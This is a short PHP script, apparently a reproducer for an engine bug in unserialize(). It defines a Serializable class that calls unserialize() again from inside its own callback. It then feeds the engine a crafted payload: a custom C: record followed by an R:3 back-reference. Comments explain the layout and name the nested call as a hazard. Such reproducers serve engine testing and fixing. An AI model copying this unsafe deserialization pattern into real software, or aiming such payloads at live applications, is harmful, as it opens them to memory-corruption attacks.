<?php
/**
 * Minimal Serializable implementation driven by the script below.
 *
 * serialize() returns nothing (implicit null), so this class never emits an
 * object body itself; only the unserialize() path is exercised here.
 *
 * NOTE(review): Serializable is deprecated since PHP 8.1 in favour of
 * __serialize()/__unserialize(). It is kept here because the C: (custom)
 * serialization record the script builds is tied to Serializable.
 */
class obj implements Serializable
{
// Receives whatever the nested unserialize() call returns; untyped, and not
// read anywhere else in this file.
private $data;
public function serialize()
{
// Intentionally empty: returns null, so nothing is produced for this object.
}
public function unserialize($data)
{
// Re-enters the engine's unserialize() from inside an unserialize callback,
// with the raw custom-record payload as input. Calling unserialize() on data
// the class does not control is the hazard a reviewer would flag: a defensive
// implementation parses a restricted format (e.g. json_decode) or at least
// passes ['allowed_classes' => false] so no further objects can be created.
$this->data = unserialize($data);
//$this->data = 1;   // alternative body without the nested call, left for comparison
}
}
// Payload layout: a two-element array whose element 0 is a custom-serialized
// (C:) `obj` record wrapping an empty array, and whose element 1 is an R:
// back-reference to slot 3 of unserialize()'s internal value table. Which
// value that slot holds once the nested unserialize() inside obj::unserialize()
// has run is engine-internal bookkeeping — presumably the point of this script.
$innerBody = 'a:0:{}';

// strlen() is deliberately byte-wise: the length field of a C: record counts bytes.
$payload = sprintf(
    'a:2:{i:0;C:3:"obj":%d:{%s}i:1;R:3;}',
    strlen($innerBody),
    $innerBody
);

$result = unserialize($payload);
var_dump($result);